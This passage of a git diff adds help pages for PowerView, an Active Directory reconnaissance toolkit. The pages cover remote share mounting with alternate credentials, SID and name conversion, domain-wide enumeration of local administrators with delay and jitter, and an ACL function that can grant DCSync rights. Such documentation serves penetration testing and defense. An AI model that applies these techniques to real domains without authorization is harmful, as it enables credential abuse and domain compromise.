+Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Rights

+Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.

+Defaults to 'All'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: All

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -RightsGUID

+Manual GUID representing the right to add to the target.

+

+```yaml

+Type: Guid

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[https://adsecurity.org/?p=1906

+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906

+https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell)

+

diff --git a/docs/Recon/Add-RemoteConnection.md b/docs/Recon/Add-RemoteConnection.md
new file mode 100755
index 0000000..86112e2
--- /dev/null
+++ b/docs/Recon/Add-RemoteConnection.md
@@ -0,0 +1,114 @@
+# Add-RemoteConnection

+

+## SYNOPSIS

+Pseudo "mounts" a connection to a remote path using the specified

+credential object, allowing for access of remote resources.

+If a -Path isn't

+specified, a -ComputerName is required to pseudo-mount IPC$.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: PSReflect

+

+## SYNTAX

+

+### ComputerName (Default)

+```

+Add-RemoteConnection [-ComputerName] <String[]> -Credential <PSCredential>

+```

+

+### Path

+```

+Add-RemoteConnection [-Path] <String[]> -Credential <PSCredential>

+```

+

+## DESCRIPTION

+This function uses WNetAddConnection2W to make a 'temporary' (i.e.

+not saved) connection

+to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the

+-Credential object.

+If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.

+

+To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path

+or -ComputerName.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+$Cred = Get-Credential

+```

+

+Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$Cred = Get-Credential

+```

+

+@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection  -Credential $Cred

+

+## PARAMETERS

+

+### -ComputerName

+Specifies the system to add a \\\\ComputerName\IPC$ connection for.

+

+```yaml

+Type: String[]

+Parameter Sets: ComputerName

+Aliases: HostName, dnshostname, name

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Path

+Specifies the remote \\\\UNC\path to add the connection for.

+

+```yaml

+Type: String[]

+Parameter Sets: Path

+Aliases: 

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the remote system.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Convert-ADName.md b/docs/Recon/Convert-ADName.md
new file mode 100755
index 0000000..7f9f42b
--- /dev/null
+++ b/docs/Recon/Convert-ADName.md
@@ -0,0 +1,184 @@
+# Convert-ADName

+

+## SYNOPSIS

+Converts Active Directory object names between a variety of formats.

+

+Author: Bill Stewart, Pasquale Lantella  

+Modifications: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Convert-ADName [-Identity] <String[]> [[-OutputType] <String>] [[-Domain] <String>] [[-Server] <String>]

+ [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)

+and translates Active Directory names between various formats using the NameTranslate COM object.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Convert-ADName -Identity "TESTLAB\harmj0y"

+```

+

+harmj0y@testlab.local

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical

+```

+

+testlab.local/Users/krbtgt

+testlab.local/Users/Administrator

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local

+```

+

+CN=harmj0y,CN=Users,DC=testlab,DC=local

+

+### -------------------------- EXAMPLE 4 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)

+'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred

+

+TESTLAB\harmj0y

+

+## PARAMETERS

+

+### -Identity

+Specifies the Active Directory object name to translate, of the following form:

+

+    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'

+    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'

+    NT4               domain\username; e.g., 'fabrikam\pflynn'

+    Display           display name, e.g.

+'pflynn'

+    DomainSimple      simple domain name format, e.g.

+'pflynn@fabrikam.com'

+    EnterpriseSimple  simple enterprise name format, e.g.

+'pflynn@fabrikam.com'

+    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'

+    UPN               user principal name; e.g., 'pflynn@fabrikam.com'

+    CanonicalEx       extended canonical name format

+    SPN               service principal name format; e.g.

+'HTTP/kairomac.contoso.com'

+    SID               Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Name, ObjectName

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -OutputType

+Specifies the output name type you want to convert to, which must be one of the following:

+

+    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'

+    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'

+    NT4               domain\username; e.g., 'fabrikam\pflynn'

+    Display           display name, e.g.

+'pflynn'

+    DomainSimple      simple domain name format, e.g.

+'pflynn@fabrikam.com'

+    EnterpriseSimple  simple enterprise name format, e.g.

+'pflynn@fabrikam.com'

+    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'

+    UPN               user principal name; e.g., 'pflynn@fabrikam.com'

+    CanonicalEx       extended canonical name format, e.g.

+'fabrikam.com/Users/Phineas Flynn'

+    SPN               service principal name format; e.g.

+'HTTP/kairomac.contoso.com'

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the translation, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to for the translation.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: 4

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+Specifies an alternate credential to use for the translation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 5

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+Accepts one or more objects name strings on the pipeline.

+

+## OUTPUTS

+

+### String

+

+Outputs a string representing the converted name.

+

+## NOTES

+

+## RELATED LINKS

+

+[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats

+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats

+https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67)

+

diff --git a/docs/Recon/ConvertFrom-SID.md b/docs/Recon/ConvertFrom-SID.md
new file mode 100755
index 0000000..186e19b
--- /dev/null
+++ b/docs/Recon/ConvertFrom-SID.md
@@ -0,0 +1,126 @@
+# ConvertFrom-SID

+

+## SYNOPSIS

+Converts a security identifier (SID) to a group/user name.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Convert-ADName

+

+## SYNTAX

+

+```

+ConvertFrom-SID [-ObjectSid] <String[]> [[-Domain] <String>] [[-Server] <String>]

+ [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+Converts a security identifier string (SID) to a group/user name

+using Convert-ADName.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108

+```

+

+TESTLAB\harmj0y

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+"S-1-5-21-890171859-3433809279-3366196753-1107", "S-1-5-21-890171859-3433809279-3366196753-1108", "S-1-5-32-562" | ConvertFrom-SID

+```

+

+TESTLAB\WINDOWS2$

+TESTLAB\harmj0y

+BUILTIN\Distributed COM Users

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)

+ConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred

+

+TESTLAB\harmj0y

+

+## PARAMETERS

+

+### -ObjectSid

+Specifies one or more SIDs to convert.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: SID

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the translation, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to for the translation.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+Specifies an alternate credential to use for the translation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+Accepts one or more SID strings on the pipeline.

+

+## OUTPUTS

+

+### String

+

+The converted DOMAIN\username.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/ConvertFrom-UACValue.md b/docs/Recon/ConvertFrom-UACValue.md
new file mode 100755
index 0000000..c75f942
--- /dev/null
+++ b/docs/Recon/ConvertFrom-UACValue.md
@@ -0,0 +1,127 @@
+# ConvertFrom-UACValue

+

+## SYNOPSIS

+Converts a UAC int value to human readable form.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+ConvertFrom-UACValue [-Value] <Int32> [-ShowAll]

+```

+

+## DESCRIPTION

+This function will take an integer that represents a User Account

+Control (UAC) binary blob and will covert it to an ordered

+dictionary with each bitwise value broken out.

+By default only values

+set are displayed- the -ShowAll switch will display all values with

+a + next to the ones set.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+ConvertFrom-UACValue -Value 66176

+```

+

+Name                           Value

+----                           -----

+ENCRYPTED_TEXT_PWD_ALLOWED     128

+NORMAL_ACCOUNT                 512

+DONT_EXPIRE_PASSWORD           65536

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainUser harmj0y | ConvertFrom-UACValue

+```

+

+Name                           Value

+----                           -----

+NORMAL_ACCOUNT                 512

+DONT_EXPIRE_PASSWORD           65536

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+Get-DomainUser harmj0y | ConvertFrom-UACValue -ShowAll

+```

+

+Name                           Value

+----                           -----

+SCRIPT                         1

+ACCOUNTDISABLE                 2

+HOMEDIR_REQUIRED               8

+LOCKOUT                        16

+PASSWD_NOTREQD                 32

+PASSWD_CANT_CHANGE             64

+ENCRYPTED_TEXT_PWD_ALLOWED     128

+TEMP_DUPLICATE_ACCOUNT         256

+NORMAL_ACCOUNT                 512+

+INTERDOMAIN_TRUST_ACCOUNT      2048

+WORKSTATION_TRUST_ACCOUNT      4096

+SERVER_TRUST_ACCOUNT           8192

+DONT_EXPIRE_PASSWORD           65536+

+MNS_LOGON_ACCOUNT              131072

+SMARTCARD_REQUIRED             262144

+TRUSTED_FOR_DELEGATION         524288

+NOT_DELEGATED                  1048576

+USE_DES_KEY_ONLY               2097152

+DONT_REQ_PREAUTH               4194304

+PASSWORD_EXPIRED               8388608

+TRUSTED_TO_AUTH_FOR_DELEGATION 16777216

+PARTIAL_SECRETS_ACCOUNT        67108864

+

+## PARAMETERS

+

+### -Value

+Specifies the integer UAC value to convert.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: UAC, useraccountcontrol

+

+Required: True

+Position: 1

+Default value: 0

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ShowAll

+Switch.

+Signals ConvertFrom-UACValue to display all UAC values, with a + indicating the value is currently set.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### Int

+

+Accepts an integer representing a UAC binary blob.

+

+## OUTPUTS

+

+### System.Collections.Specialized.OrderedDictionary

+

+An ordered dictionary with the converted UAC fields.

+

+## NOTES

+

+## RELATED LINKS

+

+[https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)

+

diff --git a/docs/Recon/ConvertTo-SID.md b/docs/Recon/ConvertTo-SID.md
new file mode 100755
index 0000000..71e9cea
--- /dev/null
+++ b/docs/Recon/ConvertTo-SID.md
@@ -0,0 +1,120 @@
+# ConvertTo-SID

+

+## SYNOPSIS

+Converts a given user/group name to a security identifier (SID).

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Convert-ADName, Get-DomainObject, Get-Domain

+

+## SYNTAX

+

+```

+ConvertTo-SID [-ObjectName] <String[]> [[-Domain] <String>] [[-Server] <String>] [[-Credential] <PSCredential>]

+```

+

+## DESCRIPTION

+Converts a "DOMAIN\username" syntax to a security identifier (SID)

+using System.Security.Principal.NTAccount's translate function.

+If alternate

+credentials are supplied, then Get-ADObject is used to try to map the name

+to a security identifier.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+ConvertTo-SID 'DEV\dfm'

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+'DEV\dfm','DEV\krbtgt' | ConvertTo-SID

+```

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+'TESTLAB\dfm' | ConvertTo-SID -Credential $Cred

+

+## PARAMETERS

+

+### -ObjectName

+The user/group name to convert, can be 'user' or 'DOMAIN\user' format.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: Name, Identity

+

+Required: True

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Domain

+Specifies the domain to use for the translation, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to for the translation.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: 3

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+Specifies an alternate credential to use for the translation.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 4

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### String

+

+Accepts one or more username specification strings on the pipeline.

+

+## OUTPUTS

+

+### String

+

+A string representing the SID of the translated name.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Export-PowerViewCSV.md b/docs/Recon/Export-PowerViewCSV.md
new file mode 100755
index 0000000..d2d2a89
--- /dev/null
+++ b/docs/Recon/Export-PowerViewCSV.md
@@ -0,0 +1,117 @@
+# Export-PowerViewCSV

+

+## SYNOPSIS

+Converts objects into a series of comma-separated (CSV) strings and saves the

+strings in a CSV file in a thread-safe manner.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: None

+

+## SYNTAX

+

+```

+Export-PowerViewCSV -InputObject <PSObject[]> [-Path] <String> [[-Delimiter] <Char>] [-Append]

+```

+

+## DESCRIPTION

+This helper exports an -InputObject to a .csv in a thread-safe manner

+using a mutex.

+This is so the various multi-threaded functions in

+PowerView has a thread-safe way to export output to the same file.

+Uses .NET IO.FileStream/IO.StreamWriter objects for speed.

+

+Originally based on Dmitry Sotnikov's Export-CSV code: http://poshcode.org/1590

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Get-DomainUser | Export-PowerViewCSV -Path "users.csv"

+```

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Get-DomainUser | Export-PowerViewCSV -Path "users.csv" -Append -Delimiter '|'

+```

+

+## PARAMETERS

+

+### -InputObject

+Specifies the objects to export as CSV strings.

+

+```yaml

+Type: PSObject[]

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: Named

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -Path

+Specifies the path to the CSV output file.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: True

+Position: 2

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delimiter

+Specifies a delimiter to separate the property values.

+The default is a comma (,)

+

+```yaml

+Type: Char

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: 3

+Default value: ,

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Append

+Indicates that this cmdlet adds the CSV output to the end of the specified file.

+Without this parameter, Export-PowerViewCSV replaces the file contents without warning.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+### PSObject

+

+Accepts one or more PSObjects on the pipeline.

+

+## OUTPUTS

+

+## NOTES

+

+## RELATED LINKS

+

+[http://poshcode.org/1590

+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/](http://poshcode.org/1590

+http://dmitrysotnikov.wordpress.com/2010/01/19/Export-Csv-append/)

+

diff --git a/docs/Recon/Find-DomainLocalGroupMember.md b/docs/Recon/Find-DomainLocalGroupMember.md
new file mode 100755
index 0000000..be4055f
--- /dev/null
+++ b/docs/Recon/Find-DomainLocalGroupMember.md
@@ -0,0 +1,351 @@
+# Find-DomainLocalGroupMember

+

+## SYNOPSIS

+Enumerates the members of specified local group (default administrators)

+for all the targeted machines on the current (or specified) domain.

+

+Author: Will Schroeder (@harmj0y)  

+License: BSD 3-Clause  

+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetLocalGroupMember, New-ThreadedFunction

+

+## SYNTAX

+

+```

+Find-DomainLocalGroupMember [[-ComputerName] <String[]>] [-ComputerDomain <String>]

+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]

+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-GroupName <String>] [-Method <String>]

+ [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]

+ [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]

+```

+

+## DESCRIPTION

+This function enumerates all machines on the current (or specified) domain

+using Get-DomainComputer, and enumerates the members of the specified local

+group (default of Administrators) for each machine using Get-NetLocalGroupMember.

+By default, the API method is used, but this can be modified with '-Method winnt'

+to use the WinNT service provider.

+

+## EXAMPLES

+

+### -------------------------- EXAMPLE 1 --------------------------

+```

+Find-DomainLocalGroupMember

+```

+

+Enumerates the local group memberships for all reachable machines in the current domain.

+

+### -------------------------- EXAMPLE 2 --------------------------

+```

+Find-DomainLocalGroupMember -Domain dev.testlab.local

+```

+

+Enumerates the local group memberships for all reachable machines the dev.testlab.local domain.

+

+### -------------------------- EXAMPLE 3 --------------------------

+```

+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

+```

+

+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

+Find-DomainLocalGroupMember -Domain testlab.local -Credential $Cred

+

+Enumerates the local group memberships for all reachable machines the dev.testlab.local

+domain using the alternate credentials.

+

+## PARAMETERS

+

+### -ComputerName

+Specifies an array of one or more hosts to enumerate, passable on the pipeline.

+If -ComputerName is not passed, the default behavior is to enumerate all machines

+in the domain returned by Get-DomainComputer.

+

+```yaml

+Type: String[]

+Parameter Sets: (All)

+Aliases: DNSHostName

+

+Required: False

+Position: 1

+Default value: None

+Accept pipeline input: True (ByPropertyName, ByValue)

+Accept wildcard characters: False

+```

+

+### -ComputerDomain

+Specifies the domain to query for computers, defaults to the current domain.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerLDAPFilter

+Specifies an LDAP query string that is used to search for computer objects.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSearchBase

+Specifies the LDAP source to search through for computers,

+e.g.

+"LDAP://OU=secret,DC=testlab,DC=local".

+Useful for OU queries.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerOperatingSystem

+Search computers with a specific operating system, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: OperatingSystem

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerServicePack

+Search computers with a specific service pack, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: ServicePack

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ComputerSiteName

+Search computers in the specific AD Site name, wildcards accepted.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: SiteName

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -GroupName

+The local group name to query for users.

+If not given, it defaults to "Administrators".

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Administrators

+Accept pipeline input: True (ByPropertyName)

+Accept wildcard characters: False

+```

+

+### -Method

+The collection method to use, defaults to 'API', also accepts 'WinNT'.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: CollectionMethod

+

+Required: False

+Position: Named

+Default value: API

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Server

+Specifies an Active Directory server (domain controller) to bind to.

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: DomainController

+

+Required: False

+Position: Named

+Default value: None

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -SearchScope

+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).

+

+```yaml

+Type: String

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: Subtree

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ResultPageSize

+Specifies the PageSize to set for the LDAP searcher object.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 200

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -ServerTimeLimit

+Specifies the maximum amount of time the server spends searching.

+Default of 120 seconds.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Tombstone

+Switch.

+Specifies that the searcher should also return deleted/tombstoned objects.

+

+```yaml

+Type: SwitchParameter

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: False

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Credential

+A \[Management.Automation.PSCredential\] object of alternate credentials

+for connection to the target domain and target systems.

+

+```yaml

+Type: PSCredential

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: [Management.Automation.PSCredential]::Empty

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Delay

+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Jitter

+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3

+

+```yaml

+Type: Double

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 0.3

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+### -Threads

+The number of threads to use for user searching, defaults to 20.

+

+```yaml

+Type: Int32

+Parameter Sets: (All)

+Aliases: 

+

+Required: False

+Position: Named

+Default value: 20

+Accept pipeline input: False

+Accept wildcard characters: False

+```

+

+## INPUTS

+

+## OUTPUTS

+

+### PowerView.LocalGroupMember.API

+

+Custom PSObject with translated group property fields from API results.

+

+PowerView.LocalGroupMember.WinNT

+

+Custom PSObject with translated group property fields from WinNT results.

+

+## NOTES

+

+## RELATED LINKS

+

diff --git a/docs/Recon/Find-DomainObjectPropertyOutlier.md b/docs/Recon/Find-DomainObjectPropertyOutlier.md
new file mode 100755
index 0000000..280e8ef
--- /dev/null
+++ b/docs/Recon/Find-DomainObjectPropertyOutlier.md
@@ -0,0 +1,261 @@
+# Find-DomainObjectPropertyOutlier

+

+## SYNOPSIS

+Finds user/group/computer objects in AD that have 'outlier' properties set.
